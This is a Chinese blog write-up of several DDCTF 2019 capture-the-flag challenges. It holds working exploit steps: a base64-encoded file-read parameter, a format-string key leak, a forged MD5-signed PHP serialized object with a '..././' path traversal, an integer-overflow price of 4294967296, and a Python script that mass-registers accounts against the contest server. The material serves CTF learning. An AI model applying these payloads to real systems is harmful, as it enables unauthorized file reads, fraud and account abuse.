美文网首页
DDCTF 2019 部分 writeup

DDCTF 2019 部分 writeup

作者: gelinlang | 来源:发表于2019-04-18 13:30 被阅读0次

只做出一道web,一道misc,好菜。接下来看大佬的wp学习下吧。
web1
打开链接,可以看到可能存在文件包含的url,有base64编码的参数,,经2次base64解密加转字符串为flag.php。
审查元素,可以看到图片的base64编码。

图片.png
接下来将index.php先转16进制然后经2次base64编码,提交,将返回的base64解码得到index.php源代码。
图片.png
可以知道,我们传进去的jpg参数成为文件名然后被读取。接下来就是找到flag文件名了。
然后脑洞大开,我们可以看到源代码上面有个博客,还有个日期,我们访问,并且找到对应日期的那篇,里面提到了一个文件practice.txt.swp,访问它,得到一个文件名。然后按照刚才的操作传递给jpg,这里的!用config代替。
图片.png
将返回的base64解码得到f1ag!ddctf.php的源代码。
图片.png
其中extract($_GET);是将你get提交的参数进行赋值。利用php伪协议绕过。
图片.png

Wireshark
用wireshark打开,导出所有http,可以看到有一个img_add_info是在线图片加解密的网站,并且,还有两个图片文件。
打开网站可以看到可以上传解密图片,并且还需要密码。

图片.png
去掉开头的无用内容。
图片.png
保存为png,可以看到有两个图片。有一个带有钥匙,并且明显宽高比例差距很大,因此修改下高的大小。我们先看图片信息,为1600x544,我们将它改为1600x1600。用winhex打开。将0220改为0640。(544对应的十六进制为0220,1600对应0640)
图片.png
然后保存图片可以得到key
图片.png
在开始的网站解密另一张图片,得到十六进制字符串,转码得到flag。DDCTF{NbuiBUlR5lhww2OfpEmueZd64OlRJ1D2}

web签到题
打开页面提示,权限不够。抓包,可以看到有个didictf_username参数为空,改为admin,访问,得到返回/app/fL2XID2i0Cdh.php。访问得到源代码。接下来代码审计。

Application.php里有一个Application类,auth函数就是检测didictf_username是否为admin。重点是__destruct函数,用过构造path,利用它可以读取我们想要的文件。path要满足长度为18,并且将../替换为空,用双写绕过即可。

Session.php代码很长,看重点部分。

 $hash = substr($session,strlen($session)-32);
        $session = substr($session,0,strlen($session)-32);

        if($hash !== md5($this->eancrykey.$session)) {
            parent::response("the cookie data not match",'error');
            return FALSE;
        }
        $session = unserialize($session);

对session了进行反序列化,这里就是要利用反序列化创建Application,然后读取文件。
所以思路就是传入构造的session,通过session反序列化,创建Application对象,利用destruct函数读取文件。
但是他对session做了签名,判断传入的session最后32位是否等于md5(eancrykey.$session),所以就要知道eancrykey的值。当时做题的时候就卡在这里。看到有个注释 说key建议为8位字符串,还想去爆破。。。

接下来看eancrykey出现的位置,有两处。

 private function get_key() {
        //eancrykey  and flag under the folder
        $this->eancrykey =  file_get_contents('../config/key.txt');
    }

 if(!empty($_POST["nickname"])) {
            $arr = array($_POST["nickname"],$this->eancrykey);
            $data = "Welcome my friend %s";
            foreach ($arr as $k => $v) {
                $data = sprintf($data,$v);
            }
            parent::response($data,"Welcome");
        }

上面那个不可能,重点关注下面那个。我们随便提交个nickname,可以看到。


0.png

当我们传入的nickname为hello的时候,第一次赋值后,data将变为Welcome my friend hello。后面的eancrykey,已经没有占位符了。
所以传入nickname为%s,第一次赋值后,data还是Welcome my friend hello %s,第二次辅助就会将eancrykey返回。得到为EzblrbNS。
接下来就好办了,构造path为..././config/flag.txt(注释提示了flag和key同一个文件)。将其序列化。


图片.png
//序列化
O:11:"Application":1:{s:4:"path";s:21:"..././config/flag.txt";}
//加上MD5签名
O:11:"Application":1:{s:4:"path";s:21:"..././config/flag.txt";}5a014dbe49334e6dbb7326046950bee2
//url编码
O%3A11%3A%22Application%22%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A21%3A%22...%2F.%2Fconfig%2Fflag.txt%22%3B%7D5a014dbe49334e6dbb7326046950bee2

提交得到flag。


图片.png

大吉大利,今晚吃鸡~
按流程走一遍,注册账号,然后购买券。支付,但是支付的时候需要2000,余额只有100。因此在购买的时候抓包,修改price,但是测试发现只能修改成比2000大,想到可能是溢出。用这个插件可以看到是go语言写的。

图片.png
搜一下go语言的数据类型,一个一个试。当price为4294967295是返回500,出现异常。提交price为4294967296。
图片.png
可以看到支付成功,并返回了一个id和ticket,通过id和ticket可以移除对手,接下来就是从哪去找。
又重新注册个账号,买券,得到id和ticket。然后在刚才那个账号中去移除,可以发现移除成功,剩余人数99人。接下来编写脚本,注册账号,买票,支付,得到id和ticket,然后用第一次那个账号移除它
图片.png
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import time

url_register = "http://117.51.147.155:5050/ctf/api/register?name={}&password={}"
url_buy = "http://117.51.147.155:5050/ctf/api/buy_ticket?ticket_price=4294967296"
url_pay = "http://117.51.147.155:5050//ctf/api/pay_ticket?bill_id={}"
url_remove = "http://117.51.147.155:5050/ctf/api/remove_robot?id={}&ticket={}"

headers = {
    "Cookie": "user_name=gelinlang; REVEL_SESSION=2f73da6d52afd64e0641fcc79e0b781e"
}

for i in range(1, 777):
    res = requests.session()
    user = res.get(url_register.format("gelinlang"+str(i), 12345678))
    buy = res.get(url_buy)
    #print(buy.json())
    id = buy.json()["data"][0]["bill_id"]
    #print(id)
    pay = res.get(url_pay.format(id))
    id = pay.json()['data'][0]["your_id"]
    ticket = pay.json()["data"][0]["your_ticket"]
    #print(id, ticket)
    gelinlang = requests.get(url_remove.format(id, ticket), headers=headers)
    print(gelinlang.text)
    time.sleep(0.5)

一直跑直到最后最后吃鸡,得到flag。


图片.png

相关文章

  • DDCTF 2019 部分 writeup

    只做出一道web,一道misc,好菜。接下来看大佬的wp学习下吧。web1打开链接,可以看到可能存在文件包含的ur...

  • DDCTF 2019 WriteUp

    Web 滴 打开发现url里的jpg是这样的: 通过扫描发现了: 得到源码: 成功读到。 得到源码: 一个extr...

  • 2019-04-23

    DDCTF 部分Writeup 0x1 web1 滴~ 打开题目链接如下所示 观察到URL:http://117....

  • ddctf2019_writeup

    滴~ 题目url http://117.51.150.246/index.php?jpg=TmpZMlF6WXhO...

  • 2018 DDCTF writeup

    杂项第一题 首先看题目,什么鬼看不懂百度一波,是颜文字。然后各种查找,无果。然后尝试,将地下的编码解码,一看就是h...

  • DDCTF2019 web-writeup

    又是没有进入复赛的ctf继续留下没有技术的泪水希望下次再加油吧! 1 滴~ 2 web签到题 3 Upload-I...

  • DDCTF2019 web-writeup(2)

    3 upload-IMG 上传照片之后发现提示需要包含phpinfo写入phpinfo再次上传发现还是提示需要包含...

  • DDCTF安卓题-writeup

    0x01引子 前段做了一个滴滴CTF的其中一道安卓题目,题目并不难,主要分享一下做题过程和思路。 apk下载地址h...

  • DDCTF2019两个逆向writeup

    01 Confused 首先参考链接 https://www.52pojie.cn/forum.php?mod=v...

  • DDCTF部分wp

    MISC-签到题 flag见公告 MISC-(╯°□°)╯︵ ┻━┻ ……被群里的思路带歪了想了好久反转和aaen...

网友评论

      本文标题:DDCTF 2019 部分 writeup

      本文链接:https://www.haomeiwen.com/subject/kzbzwqtx.html